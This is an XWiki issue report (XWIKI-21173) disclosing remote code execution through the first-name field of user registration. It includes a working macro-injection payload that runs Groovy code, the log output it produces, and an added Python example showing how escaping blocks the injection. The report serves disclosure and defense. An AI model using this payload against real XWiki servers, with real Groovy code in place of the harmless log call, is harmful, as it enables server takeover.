XWiki Platform: XWIKI-21173

RCE via first name in user registration


    Description

      Steps to reproduce:

      1. Open the user registration (needs to be enabled for guests)
      2. Register with any username and password and first name set to
        ]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded!"){{/groovy}}{{/async}}

      Expected result:

      A success message that the user with the provided first name has been generated is displayed, linking to the new user profile. Also, no log message is generated.

      Actual result:

      The displayed success message is

      Registration{{/html}} >>XWiki.testuser]] (testuser): Registration successful.

      and a message like

      2023-07-27 13:41:02,453 [qtp2005169944-5746 - http://localhost:9016/xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fxwiki%2Fbin%2Fview%2FMain%2F] ERROR attacker                       - Attack succeeded!

      is logged.

      This vulnerability has existed since XAADMINISTRATION-77; according to that issue, this corresponds to XWiki 2.2, which is also confirmed by the release notes.
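To make the failure mode concrete from the defender's side, the following added example (Python, not XWiki's code) shows why the first name must be escaped before it is placed into wiki markup: a minimal macro tokenizer that honours the `~` escape character of XWiki Syntax 2.1 shows the raw value from the report opening the async and groovy macros, while the escaped value leaves only the template's own html macro. The template string is an assumption standing in for the real registration success message.

```python
import re

# Value quoted in the issue's reproduction steps (constructed test input, copied from the report).
PAYLOAD = (']]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker")'
           '.error("Attack succeeded!"){{/groovy}}{{/async}}')

# Simplified stand-in for the registration success message; an assumption, not XWiki's template.
TEMPLATE = '{{html wiki="true"}}[[FIRST>>XWiki.USER]] (USER): Registration successful.{{/html}}'


def escape_xwiki21(text: str) -> str:
    """Prefix every character with '~', the XWiki Syntax 2.1 escape character, so the
    value renders literally and can neither close the link nor open or close a macro."""
    return ''.join('~' + ch for ch in text)


def build_message(first: str, user: str, escape: bool) -> str:
    """Interpolate the user-controlled first name into the message, optionally escaped."""
    if escape:
        first = escape_xwiki21(first)
    return TEMPLATE.replace('FIRST', first).replace('USER', user)


_MACRO_RE = re.compile(r'\{\{(/?[A-Za-z_][\w-]*)')


def macro_tokens(markup: str) -> list[str]:
    """Return the macro open/close tokens a renderer would act on, honouring '~' escapes:
    an escaped character (and the '~' before it) is literal text and never starts a macro."""
    tokens = []
    i = 0
    while i < len(markup):
        if markup[i] == '~':
            i += 2                      # skip the escape and the character it protects
            continue
        m = _MACRO_RE.match(markup, i)
        if m:
            tokens.append(m.group(1))
            i = m.end()
            continue
        i += 1
    return tokens


if __name__ == '__main__':
    print('unescaped:', macro_tokens(build_message(PAYLOAD, 'testuser', escape=False)))
    print('escaped:  ', macro_tokens(build_message(PAYLOAD, 'testuser', escape=True)))
```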

People

  Michael Hamann